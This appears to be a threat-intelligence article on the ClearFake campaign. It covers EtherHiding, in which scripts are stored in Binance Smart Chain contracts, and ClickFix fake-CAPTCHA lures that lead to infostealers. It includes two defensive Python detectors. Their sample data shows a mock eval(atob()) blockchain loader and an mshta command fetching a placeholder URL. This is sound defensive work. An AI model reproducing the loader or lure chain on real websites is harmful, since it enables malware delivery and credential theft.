The Evolution of ClearFake: A Deep Dive into Web3 Exploitation
The ClearFake malware family has become a significant threat, and its latest version exploits Web3 capabilities: it loads malicious scripts, resources, and payloads from smart contracts on a public blockchain, using the decentralized nature of that infrastructure to keep its components available and hard to take down.
The Genesis of ClearFake
First identified in July 2023, ClearFake initially relied on traditional social engineering tactics to spread its malicious payloads. The malware primarily targeted users through compromised websites, particularly those built on WordPress. By employing the ClickFix technique, ClearFake displayed fake error pages that prompted users to copy and paste malicious PowerShell scripts into their Windows terminals. This approach proved effective, with approximately 200,000 unique users visiting compromised sites by July 2024.
The EtherHiding Method: A Game Changer
The latest iteration of ClearFake, which surfaced in December 2024, introduced a groundbreaking technique known as EtherHiding. This method utilizes the Binance Smart Chain to store malicious files within smart contracts, effectively transforming the blockchain into a storage medium for malware resources. Smart contracts, which are self-executing digital agreements, allow ClearFake to retrieve various files, including the ClickFix PowerShell payload.
When a user visits a compromised website, the initial JavaScript code executed loads Application Binary Interfaces (ABIs) necessary for interacting with the smart contracts linked to the attackers’ Ethereum wallets. These ABIs define how applications should communicate with the smart contracts, enabling the retrieval and execution of the malicious code stored within.
The Mechanics of the Attack
ClearFake’s attack chain is built to evade detection and to deliver its payloads reliably. Throughout the attack, the malware retrieves additional JavaScript, ABIs, and the URLs of the encrypted ClickFix lure HTML from smart contracts tied to multiple wallets. This multi-stage approach complicates detection and also allows the collection of system, browser, and cookie information from visitors.
The encrypted ClickFix HTML is typically hosted on Cloudflare Pages, which further obscures its purpose. Storing loader resources on a public blockchain not only helps evade traditional detection methods but also means that the malicious files cannot be removed by a hosting provider or registrar: once written to the chain they remain available indefinitely, which makes the campaign difficult to eradicate.
Social Engineering Tactics: The ClickFix Lure
The ClickFix social engineering technique has evolved alongside ClearFake, with recent phishing lures imitating legitimate CAPTCHA verification pages. These fake CAPTCHA prompts, which resemble Cloudflare Turnstile or reCAPTCHA pages, trick users into executing malicious PowerShell commands. For instance, the Cloudflare imitation displays a ClickFix prompt after two failed verification attempts, while the reCAPTCHA imitation presents a realistic image selection task followed by a “DNS error” message.
Once a user runs the pasted PowerShell command, it launches Mshta.exe, which retrieves and runs JavaScript from a remote server. This chain ultimately installs various infostealers, including Emmenhtal Loader and Lumma Stealer. Since January 2025, ClearFake has also been observed distributing Vidar Stealer through a basic PowerShell loader.
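The ClickFix execution chain described above (pasted PowerShell command, then Mshta.exe fetching a script from a remote server) is something a defender can hunt for in process-creation telemetry. The following is an added example, not code from the original article or from Sekoia.io: it walks constructed Sysmon-style process events, flags mshta.exe launched with a URL on its command line when a PowerShell host appears in its ancestry, and ignores local-HTA and interactive-shell cases. The event layout, hostnames (reserved .invalid TLD) and command lines are all constructed placeholders.

```python
import re
from typing import Dict, List

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Constructed Sysmon-style process-creation events (not real telemetry).
# Hostnames use the reserved .invalid TLD; command lines are placeholders.
SAMPLE_EVENTS: List[Dict] = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "[pasted ClickFix text placeholder]"'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://placeholder.invalid/loader"},
    # Benign: an installer running a local HTA (no URL, no script-host ancestor).
    {"ProcessId": 400, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # Benign: an interactive PowerShell session with no mshta child.
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
]


def _image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def _ancestry(event: Dict, by_pid: Dict[int, Dict], max_depth: int = 8) -> List[Dict]:
    """Walk ParentProcessId links upward; oldest ancestor first.

    Caveat: PIDs are reused on Windows, so production logic should key on a
    stable identifier such as Sysmon's ProcessGuid rather than the bare PID.
    """
    chain = [event]
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ParentProcessId"])
        if parent is None:
            break
        chain.append(parent)
        current = parent
    return list(reversed(chain))


def detect_clickfix_chain(events: List[Dict]) -> List[Dict]:
    """Flag mshta.exe fetching a remote script underneath a PowerShell host."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for event in events:
        if _image_name(event["Image"]) != "mshta.exe":
            continue
        url = URL_RE.search(event["CommandLine"])
        if not url:
            continue  # local .hta files are common in legitimate installers
        chain = _ancestry(event, by_pid)
        images = [_image_name(p["Image"]) for p in chain]
        # Require a PowerShell host somewhere above mshta.exe in the tree.
        if not any(name in SCRIPT_HOSTS for name in images[:-1]):
            continue
        findings.append({
            "pid": event["ProcessId"],
            "chain": images,
            "url": url.group(0),
            "command_line": event["CommandLine"],
        })
    return findings


if __name__ == "__main__":
    for hit in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"ALERT pid={hit['pid']} chain={' > '.join(hit['chain'])} url={hit['url']}")
```

The URL requirement and the ancestry check are what keep the false-positive rate manageable; mshta.exe alone is noisy in environments with legacy HTA-based tooling.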
The Scale of Compromise
Using the wallet addresses associated with the ClearFake campaign as indicators of compromise, researchers from Sekoia.io scanned Censys data and uncovered over 9,300 compromised websites as of February 24, 2025. This figure underscores the breadth of ClearFake’s impact and the need for stronger website hardening and monitoring.
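The two defensive points above fit together: the loader pattern from the "Mechanics of the Attack" section (a Web3 client library, an ABI, a JSON-RPC endpoint and a contract address whose output is executed) gives a page-level heuristic, and the wallet and contract addresses used as indicators give an exact-match check. The following is an added example, not code from the article or from Sekoia.io, showing both over constructed HTML fragments. The placeholder contract address, the `cdn.example` host and the sample page content are all constructed; the public BSC RPC hostname in the sample is only there so the endpoint pattern has something to match.

```python
import re
from dataclasses import dataclass
from typing import List

# Heuristic indicators of an EtherHiding-style loader embedded in a web page.
WEB3_LIB = re.compile(r"\b(ethers|web3|Web3)\b")
RPC_ENDPOINT = re.compile(r"https?://[^'\"\s<>]*(bsc|binance|rpc)[^'\"\s<>]*", re.I)
ABI_FRAGMENT = re.compile(r'"type"\s*:\s*"function"')
CONTRACT_ADDR = re.compile(r"0x[0-9a-fA-F]{40}(?![0-9a-fA-F])")
EXEC_SINK = re.compile(r"\b(eval|Function|atob|document\.write)\s*\(")

# Constructed placeholder; NOT a real ClearFake contract or wallet address.
PLACEHOLDER_CONTRACT = "0x" + "11" * 20

# Constructed page fragments (not real ClearFake code) used as sample input.
SAMPLE_PAGES = {
    "clean": "<html><script src='/wp-content/themes/x/main.js'></script></html>",
    "suspicious": (
        "<script src='https://cdn.example/ethers.min.js'></script>"
        "<script>"
        "const p = new ethers.JsonRpcProvider('https://bsc-dataseed.binance.org/');"
        "const abi = [{\"name\":\"get\",\"type\":\"function\",\"inputs\":[],"
        "\"outputs\":[{\"type\":\"string\"}]}];"
        f"const c = new ethers.Contract('{PLACEHOLDER_CONTRACT}', abi, p);"
        "c.get().then(s => eval(atob(s)));"
        "</script>"
    ),
}


@dataclass
class Finding:
    score: int
    addresses: List[str]   # lower-cased 0x addresses seen on the page
    endpoints: List[str]   # JSON-RPC endpoints referenced by the page
    reasons: List[str]


def scan_page(html: str) -> Finding:
    """Score a page for EtherHiding-style loader indicators (heuristic)."""
    score, reasons = 0, []
    if WEB3_LIB.search(html):
        score += 1
        reasons.append("web3 client library referenced")
    endpoints = sorted({m.group(0) for m in RPC_ENDPOINT.finditer(html)})
    if endpoints:
        score += 2
        reasons.append("blockchain JSON-RPC endpoint")
    if ABI_FRAGMENT.search(html):
        score += 1
        reasons.append("inline ABI definition")
    addresses = sorted({a.lower() for a in CONTRACT_ADDR.findall(html)})
    if addresses:
        score += 1
        reasons.append("contract or wallet address")
    if EXEC_SINK.search(html):
        score += 2
        reasons.append("dynamic execution sink")
    return Finding(score, addresses, endpoints, reasons)


def is_suspicious(html: str, threshold: int = 5) -> bool:
    """A legitimate dApp page can score a few points; the sink pushes it over."""
    return scan_page(html).score >= threshold


def match_known_contracts(finding: Finding, known: List[str]) -> List[str]:
    """Exact-match the page's addresses against a list of known indicators."""
    known_set = {a.lower() for a in known}
    return [a for a in finding.addresses if a in known_set]


if __name__ == "__main__":
    for name, html in SAMPLE_PAGES.items():
        f = scan_page(html)
        print(f"{name}: score={f.score} suspicious={is_suspicious(html)} "
              f"reasons={f.reasons} addresses={f.addresses}")
```

The heuristic score is intentionally conservative: a genuine dApp front end will reference a Web3 library and an RPC endpoint, so the exact-match against known addresses is the higher-confidence signal, and the scoring is best used to prioritize pages for manual review.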
Conclusion: The Future of Cyber Threats
The advancements in the ClearFake malware family illustrate a concerning trend: by harnessing Web3 and blockchain infrastructure, threat actors are developing malware delivery methods that are harder to detect and harder to take down. As these techniques evolve, individuals and organizations need to remain vigilant, adopt robust security practices, and stay informed about the latest developments in malware tactics. The ClearFake campaign is a clear reminder of the need to prioritize cybersecurity in an increasingly interconnected world.